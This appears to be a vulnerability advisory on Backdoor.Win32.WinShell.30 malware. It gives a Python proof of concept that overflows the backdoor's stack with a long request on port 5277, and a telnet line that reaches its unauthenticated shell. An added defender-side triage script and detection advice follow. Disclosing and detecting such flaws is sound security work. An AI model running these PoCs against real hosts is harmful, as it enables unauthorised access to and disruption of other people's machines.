Backdoor.Win32.WinShell.30 Remote Stack Buffer Overflow / Missing Authentication

Backdoor.Win32.WinShell.30 malware suffers from remote stack buffer overflow and missing authentication vulnerabilities.

Exploit/PoC-1:

from socket import *

MALWARE_HOST = "x.x.x.x"
PORT = 5277

def doit():
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # 1875-byte request path followed by an HTTP/1.1 request tail
    PBARBAR = "A" * 1875 + " HTTP/1.1\r\nHost: " + MALWARE_HOST + "\r\n\r\n"
    s.send(PBARBAR.encode())  # socket.send() takes bytes, not str, on Python 3
    s.close()

    print("Backdoor.Win32.WinShell.30 / Remote Stack Buffer Overflow")
    print("MD5: 56a2b135c8d35561ea5b04694155eb77")
    print("By Malvuln")


if __name__ == "__main__":
    doit()

Exploit/PoC-2:

TELNET x.x.x.x 5277
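As an added defender-side example (not part of the Malvuln advisory), a small triage function that flags the two conditions described above: any unauthenticated session reaching the WinShell.30 listener port (PoC-2) and an oversized HTTP-style request line like the PoC-1 crash input. The port and input shape come from the advisory; the 512-byte threshold, the sample flows and their addresses are assumptions.

```python
import re

# Listener port and crash-input shape are taken from the advisory; the
# request-line length threshold is an assumption for this example.
WINSHELL_PORT = 5277
MAX_REQUEST_LINE = 512
HTTP_TAIL = re.compile(rb" HTTP/1\.[01]$")


def inspect_payload(src, dst_port, payload):
    """Triage one client->server TCP payload (constructed tuples, not pcap).

    Returns a list of alert strings; an empty list means nothing notable.
    """
    alerts = []
    if dst_port != WINSHELL_PORT:
        return alerts
    # The listener accepts any client without authentication (PoC-2 is a
    # bare telnet session), so every inbound session is worth recording.
    alerts.append(f"{src}: unauthenticated session to WinShell.30 port {dst_port}")
    end = payload.find(b"\r\n")
    request_line = payload if end < 0 else payload[:end]
    if len(request_line) > MAX_REQUEST_LINE:
        framed = "HTTP-framed" if HTTP_TAIL.search(request_line) else "unframed"
        alerts.append(
            f"{src}: {framed} request line of {len(request_line)} bytes "
            f"exceeds {MAX_REQUEST_LINE} (matches the stack-overflow input)"
        )
    return alerts


def triage(flows):
    """Run inspect_payload over (src, dst_port, payload) tuples."""
    out = []
    for src, dst_port, payload in flows:
        out.extend(inspect_payload(src, dst_port, payload))
    return out


# Constructed sample flows: a benign web request, a short session to the
# backdoor port, and a copy of the advisory's 1875-byte crash request.
SAMPLE_FLOWS = [
    ("10.0.0.5", 80, b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
    ("10.0.0.7", 5277, b"help\r\n"),
    ("10.0.0.9", 5277, b"A" * 1875 + b" HTTP/1.1\r\nHost: 10.0.0.2\r\n\r\n"),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_FLOWS):
        print(line)
```

The same two checks translate directly into a firewall log filter or IDS rule: alert on any inbound connection to TCP/5277 from the internal network, and on a request line longer than a few hundred bytes on that port.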